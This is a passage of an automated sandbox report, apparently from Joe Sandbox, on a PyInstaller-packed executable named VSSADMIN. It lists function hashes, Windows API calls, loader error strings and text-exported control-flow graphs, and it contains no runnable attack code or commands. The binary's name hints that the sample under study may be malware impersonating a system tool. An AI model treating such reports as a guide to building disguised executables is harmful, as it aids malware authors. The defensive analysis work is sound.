• Instruction Fuzzy Hash: 2062166272859A86E7199E38D41027D77A0F748785F085632EFAEC37D4EE3CEA49D700
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
• String ID:
• API String ID: 59578552-0
• Opcode ID: 2d1ec54d9dc1f814aac4ffc56ccc42f9ec7497739519b971d77b754768042176
• Instruction ID: 8589a500f0291bc674069ddf769efa1a77272bf0df5498fe465d48b40ae2e558
• Opcode Fuzzy Hash: 2d1ec54d9dc1f814aac4ffc56ccc42f9ec7497739519b971d77b754768042176
• Instruction Fuzzy Hash: 6EE0B670E1D94382F61876A95CC30BE10B05F97B30FA0023BE11AC7AD2CD6D2592AA26
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: _fread_nolock$Message_invalid_parameter_noinfo
• String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
• API String ID: 2153230061-4158440160
• Opcode ID: e036ff8412cb2c1497607d8fe513f5a54bf87ec72a6f69b8acc9117b6522fd3b
• Instruction ID: fc024c6191311fc2d0b1db3c8f92be47550509f0b7b486c87cb3a172f5e39cb1
• Opcode Fuzzy Hash: e036ff8412cb2c1497607d8fe513f5a54bf87ec72a6f69b8acc9117b6522fd3b
• Instruction Fuzzy Hash: 9A514772A1DE0286EB54CF28D4D127823B1EB8AF69B518137DA0DC3799DE3CE541C740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2030045667-3659356012
• Opcode ID: 16d69012473f287e44de233c574f772ca318ffc925a49ceb0965c1371dea1f1c
• Instruction ID: a0598e4fadd19149a255bd768ab991572d06555c9effa631d1c1ddc6ed4a0ed0
• Opcode Fuzzy Hash: 16d69012473f287e44de233c574f772ca318ffc925a49ceb0965c1371dea1f1c
• Instruction Fuzzy Hash: 32415E21A4CE8382EE24DB15E4916BA63B1EB86FA5F444433DE4D87B55EE3DE542C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00007FF614C73BC0: GetModuleFileNameW.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C73BF1
• SetDllDirectoryW.KERNEL32 ref: 00007FF614C738C5
  • Part of subcall function 00007FF614C769B0: GetEnvironmentVariableW.KERNEL32(00007FF614C73707), ref: 00007FF614C769EA
  • Part of subcall function 00007FF614C769B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF614C76A07
Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
• String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
• API String ID: 2344891160-3602715111
• Opcode ID: f952f029dedbb0839787106c5c451913a2ed49eabae97769c7967d6c7db2bfcd
• Instruction ID: 9ec78fc48b73ec43f0d657773c76d560a36c888231572b90cab4fcc9a688604f
• Opcode Fuzzy Hash: f952f029dedbb0839787106c5c451913a2ed49eabae97769c7967d6c7db2bfcd
• Instruction Fuzzy Hash: F0B18121A1CD8352EA64AB21D5D22BD23B1BF46FA6F444033EA4DC77A6EE2CE505C740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: Message
• String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2030045667-1655038675
• Opcode ID: 9cfd913426aeb6d050e1e33f254d3393e8c1727ed5781516926cd4c3ba63f663
• Instruction ID: 5067d7a9787a24981a0425461bf047e5ed231096b45583fac2050321c02ac1f1
• Opcode Fuzzy Hash: 9cfd913426aeb6d050e1e33f254d3393e8c1727ed5781516926cd4c3ba63f663
• Instruction Fuzzy Hash: 6051A422A0DE8286EA209B55E4803BA62B2FB86FB5F544137DE4DC7795EF3CE545C700
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph of the function at 7ff614c8af5c-7ff614c8b3a8, exported as text (the executed / not executed legend refers to block colouring that does not survive extraction). Imported APIs named in the graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError.
control_flow_graph 505 7ff614c8af5c-7ff614c8af82 506 7ff614c8af84-7ff614c8af98 call 7ff614c84454 call 7ff614c84474 505->506 507 7ff614c8af9d-7ff614c8afa1 505->507 521 7ff614c8b38e 506->521 508 7ff614c8b377-7ff614c8b383 call 7ff614c84454 call 7ff614c84474 507->508 509 7ff614c8afa7-7ff614c8afae 507->509 528 7ff614c8b389 call 7ff614c89de0 508->528 509->508 511 7ff614c8afb4-7ff614c8afe2 509->511 511->508 514 7ff614c8afe8-7ff614c8afef 511->514 518 7ff614c8aff1-7ff614c8b003 call 7ff614c84454 call 7ff614c84474 514->518 519 7ff614c8b008-7ff614c8b00b 514->519 518->528 524 7ff614c8b011-7ff614c8b017 519->524 525 7ff614c8b373-7ff614c8b375 519->525 526 7ff614c8b391-7ff614c8b3a8 521->526 524->525 529 7ff614c8b01d-7ff614c8b020 524->529 525->526 528->521 529->518 532 7ff614c8b022-7ff614c8b047 529->532 534 7ff614c8b049-7ff614c8b04b 532->534 535 7ff614c8b07a-7ff614c8b081 532->535 538 7ff614c8b072-7ff614c8b078 534->538 539 7ff614c8b04d-7ff614c8b054 534->539 536 7ff614c8b083-7ff614c8b0ab call 7ff614c8cafc call 7ff614c89e48 * 2 535->536 537 7ff614c8b056-7ff614c8b06d call 7ff614c84454 call 7ff614c84474 call 7ff614c89de0 535->537 565 7ff614c8b0c8-7ff614c8b0f3 call 7ff614c8b784 536->565 566 7ff614c8b0ad-7ff614c8b0c3 call 7ff614c84474 call 7ff614c84454 536->566 569 7ff614c8b200 537->569 541 7ff614c8b0f8-7ff614c8b10f 538->541 539->537 539->538 544 7ff614c8b111-7ff614c8b119 541->544 545 7ff614c8b18a-7ff614c8b194 call 7ff614c92a6c 541->545 544->545 549 7ff614c8b11b-7ff614c8b11d 544->549 556 7ff614c8b21e 545->556 557 7ff614c8b19a-7ff614c8b1af 545->557 549->545 553 7ff614c8b11f-7ff614c8b135 549->553 553->545 558 7ff614c8b137-7ff614c8b143 553->558 560 7ff614c8b223-7ff614c8b243 ReadFile 556->560 557->556 562 7ff614c8b1b1-7ff614c8b1c3 GetConsoleMode 557->562 558->545 563 7ff614c8b145-7ff614c8b147 558->563 567 7ff614c8b249-7ff614c8b251 560->567 568 7ff614c8b33d-7ff614c8b346 GetLastError 560->568 562->556 570 7ff614c8b1c5-7ff614c8b1cd 562->570 563->545 571 7ff614c8b149-7ff614c8b161 563->571 565->541 566->569 567->568 573 7ff614c8b257 567->573 576 7ff614c8b363-7ff614c8b366 568->576 577 7ff614c8b348-7ff614c8b35e call 7ff614c84474 call 7ff614c84454 568->577 578 7ff614c8b203-7ff614c8b20d call 7ff614c89e48 569->578 570->560 575 7ff614c8b1cf-7ff614c8b1f1 ReadConsoleW 570->575 571->545 579 7ff614c8b163-7ff614c8b16f 571->579 584 7ff614c8b25e-7ff614c8b273 573->584 586 7ff614c8b212-7ff614c8b21c 575->586 587 7ff614c8b1f3 GetLastError 575->587 581 7ff614c8b1f9-7ff614c8b1fb call 7ff614c843e8 576->581 582 7ff614c8b36c-7ff614c8b36e 576->582 577->569 578->526 579->545 580 7ff614c8b171-7ff614c8b173 579->580 580->545 590 7ff614c8b175-7ff614c8b185 580->590 581->569 582->578 584->578 592 7ff614c8b275-7ff614c8b280 584->592 586->584 587->581 590->545 597 7ff614c8b282-7ff614c8b29b call 7ff614c8ab74 592->597 598 7ff614c8b2a7-7ff614c8b2af 592->598 605 7ff614c8b2a0-7ff614c8b2a2 597->605 601 7ff614c8b2b1-7ff614c8b2c3 598->601 602 7ff614c8b32b-7ff614c8b338 call 7ff614c8a9b4 598->602 606 7ff614c8b31e-7ff614c8b326 601->606 607 7ff614c8b2c5 601->607 602->605 605->578 606->578 609 7ff614c8b2ca-7ff614c8b2d1 607->609 610 7ff614c8b2d3-7ff614c8b2d7 609->610 611 7ff614c8b30d-7ff614c8b318 609->611 612 7ff614c8b2f3 610->612 613 7ff614c8b2d9-7ff614c8b2e0 610->613 611->606 615 7ff614c8b2f9-7ff614c8b309 612->615 613->612 614 7ff614c8b2e2-7ff614c8b2e6 613->614 614->612 616 7ff614c8b2e8-7ff614c8b2f1 614->616 615->609 617 7ff614c8b30b 615->617 616->615 617->606
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 8cca3055efed3e3f89cedb163d8cd8c244730e245ca1d8d25453f07a0b7e0f34
                                                                                                                                                                      • Instruction ID: b024cd018be5e20a4874668f1fac934165e01dcbf1ff94a235946bc27ce63cec
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cca3055efed3e3f89cedb163d8cd8c244730e245ca1d8d25453f07a0b7e0f34
                                                                                                                                                                      • Instruction Fuzzy Hash: D8C1B23290CE8791EA609B15D4802BE6A70FB83FA0F554137EA5E87792EF7DE445D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452418845-0
                                                                                                                                                                      • Opcode ID: bbd3b8ba5c4b27b365bd4a2e4f7617ab8f70cbce2ec9e80b5769bfa1af1ddc25
                                                                                                                                                                      • Instruction ID: 1a9aaf4158639f587fd48fa07908b1b63d74956d7f4ae854f33bcb677f76da95
                                                                                                                                                                      • Opcode Fuzzy Hash: bbd3b8ba5c4b27b365bd4a2e4f7617ab8f70cbce2ec9e80b5769bfa1af1ddc25
                                                                                                                                                                      • Instruction Fuzzy Hash: F5317820E0DD4342FA14AB64E4D13BA22B1AF93FAEF405037DB0DC76E3EE2DA4448251
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                      • Opcode ID: 83f7356e998cb81ecf05bcbd92d34611756d56775b93fee33aed4649b58a8721
                                                                                                                                                                      • Instruction ID: 6e746ff8c10a07264a1b2750a7be2a62dccb794005f63ddfb84f973f81dd184b
                                                                                                                                                                      • Opcode Fuzzy Hash: 83f7356e998cb81ecf05bcbd92d34611756d56775b93fee33aed4649b58a8721
                                                                                                                                                                      • Instruction Fuzzy Hash: E2417262D18B8283F7548B61D590379B270FB96B74F10933AE69C83AD1EF7CA5A09704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

Control-flow graph of the function at 7ff614c7f3cc-7ff614c7f62a, exported as text (the executed / not executed legend refers to block colouring that does not survive extraction). No imported API is named in this graph; its intra-module call targets include 7ff614c84474, 7ff614c89de0, 7ff614c7c240, 7ff614c7bb90, 7ff614c891b4, 7ff614c8b3ac and 7ff614c8af5c, the start of the function graphed above.
control_flow_graph 917 7ff614c7f3cc-7ff614c7f3f9 918 7ff614c7f3fb-7ff614c7f3fe 917->918 919 7ff614c7f415 917->919 918->919 920 7ff614c7f400-7ff614c7f403 918->920 921 7ff614c7f417-7ff614c7f42b 919->921 922 7ff614c7f42c-7ff614c7f42f 920->922 923 7ff614c7f405-7ff614c7f40a call 7ff614c84474 920->923 924 7ff614c7f431-7ff614c7f43d 922->924 925 7ff614c7f43f-7ff614c7f443 922->925 935 7ff614c7f410 call 7ff614c89de0 923->935 924->925 927 7ff614c7f46a-7ff614c7f473 924->927 928 7ff614c7f457-7ff614c7f45a 925->928 929 7ff614c7f445-7ff614c7f44f call 7ff614c7c240 925->929 933 7ff614c7f47a 927->933 934 7ff614c7f475-7ff614c7f478 927->934 928->923 932 7ff614c7f45c-7ff614c7f468 928->932 929->928 932->923 932->927 937 7ff614c7f47f-7ff614c7f49e 933->937 934->937 935->919 939 7ff614c7f5e5-7ff614c7f5e8 937->939 940 7ff614c7f4a4-7ff614c7f4b2 937->940 939->921 941 7ff614c7f52a-7ff614c7f52f 940->941 942 7ff614c7f4b4-7ff614c7f4bb 940->942 944 7ff614c7f59c-7ff614c7f59f call 7ff614c8b3ac 941->944 945 7ff614c7f531-7ff614c7f53d 941->945 942->941 943 7ff614c7f4bd 942->943 947 7ff614c7f4c3-7ff614c7f4cd 943->947 948 7ff614c7f610 943->948 954 7ff614c7f5a4-7ff614c7f5a7 944->954 949 7ff614c7f549-7ff614c7f54f 945->949 950 7ff614c7f53f-7ff614c7f546 945->950 951 7ff614c7f5ed-7ff614c7f5f1 947->951 955 7ff614c7f4d3-7ff614c7f4d9 947->955 953 7ff614c7f615-7ff614c7f620 948->953 949->951 952 7ff614c7f555-7ff614c7f572 call 7ff614c891b4 call 7ff614c8af5c 949->952 950->949 958 7ff614c7f5f3-7ff614c7f5fb call 7ff614c7c240 951->958 959 7ff614c7f600-7ff614c7f60b call 7ff614c84474 951->959 976 7ff614c7f577-7ff614c7f579 952->976 953->921 954->953 961 7ff614c7f5a9-7ff614c7f5ac 954->961 956 7ff614c7f4db-7ff614c7f4de 955->956 957 7ff614c7f511-7ff614c7f525 955->957 962 7ff614c7f4fc-7ff614c7f507 call 7ff614c84474 call 7ff614c89de0 956->962 963 7ff614c7f4e0-7ff614c7f4e6 956->963 968 7ff614c7f5cc-7ff614c7f5d7 957->968 958->959 959->935 961->951 967 7ff614c7f5ae-7ff614c7f5c5 961->967 983 7ff614c7f50c 962->983 969 7ff614c7f4e8-7ff614c7f4f0 call 7ff614c7bb90 963->969 970 7ff614c7f4f2-7ff614c7f4f7 call 7ff614c7c240 963->970 967->968 968->940 974 7ff614c7f5dd 968->974 969->983 970->962 974->939 980 7ff614c7f625-7ff614c7f62a 976->980 981 7ff614c7f57f 976->981 980->953 981->948 984 7ff614c7f585-7ff614c7f59a 981->984 983->957 984->968
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 1c1e28680f2662e8371b11e07f92ce548ff8955c9ec9e7def54785ee8c89af03
                                                                                                                                                                      • Instruction ID: d63eb1cfdc3b1a358e1555099081bbf8e1bf2162cb84e394e83cfe1a099c9834
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c1e28680f2662e8371b11e07f92ce548ff8955c9ec9e7def54785ee8c89af03
                                                                                                                                                                      • Instruction Fuzzy Hash: CB511561B0DA8347EA68DE2594E067A62A0BF46FB5F144732DE6CC37D5CF3CD4018600
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
• API ID: Initialize_invalid_parameter_noinfo_set_fmode
• String ID:
• API String ID: 3548387204-0
• Opcode ID: 6f4d91f14022360dab0355fac000d53ce384dee1e6364c71d03b9cb5aa4004ae
• Instruction ID: 7dac8cf696f043d08095e1d376b5c02c65d0c39e38cb242a4132a6de8e27f6f2
• Opcode Fuzzy Hash: 6f4d91f14022360dab0355fac000d53ce384dee1e6364c71d03b9cb5aa4004ae
• Instruction Fuzzy Hash: AA119D44E0CA4343FA5877B588C62FA01B05FA3B7AF840436EB0EC71D3ED5DB8404262
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• FindCloseChangeNotification.KERNEL32(?,?,?,00007FF614C89ED5,?,?,00000000,00007FF614C89F8A), ref: 00007FF614C8A0C6
• GetLastError.KERNEL32(?,?,?,00007FF614C89ED5,?,?,00000000,00007FF614C89F8A), ref: 00007FF614C8A0D0
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ChangeCloseErrorFindLastNotification
• String ID:
• API String ID: 1687624791-0
• Opcode ID: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
• Instruction ID: 1cbc991455a442d19bc62fd000a59500d9951bf783d4da7aa4dbcd4893adfa7f
• Opcode Fuzzy Hash: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
• Instruction Fuzzy Hash: A421A421F18E4341FA505769A4D037D25A19F86FB4F04523BDA2EC73D6CF6EE445A301
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointerEx.KERNEL32(?,?,?,?,00000000,00007FF614C8B7CD), ref: 00007FF614C8B680
• GetLastError.KERNEL32(?,?,?,?,00000000,00007FF614C8B7CD), ref: 00007FF614C8B68A
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
• Instruction ID: 0cbb14d3c37acebcc0054627e3272f1c9e17f948f01dec6ec1feade9a862164d
• Opcode Fuzzy Hash: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
• Instruction Fuzzy Hash: E211C161B18E8281DA208B25E884169B371BB86FF4F544336EE7D8B7E9DF3CE0148700
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF614C880B2,?,?,00000000,00007FF614C885A6,?,?,?,?,00007FF614C90554,?,?,00000000), ref: 00007FF614C91BC0
• FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF614C880B2,?,?,00000000,00007FF614C885A6,?,?,?,?,00007FF614C90554,?,?,00000000), ref: 00007FF614C91C2A
Memory Dump Source
• Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
• Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmp
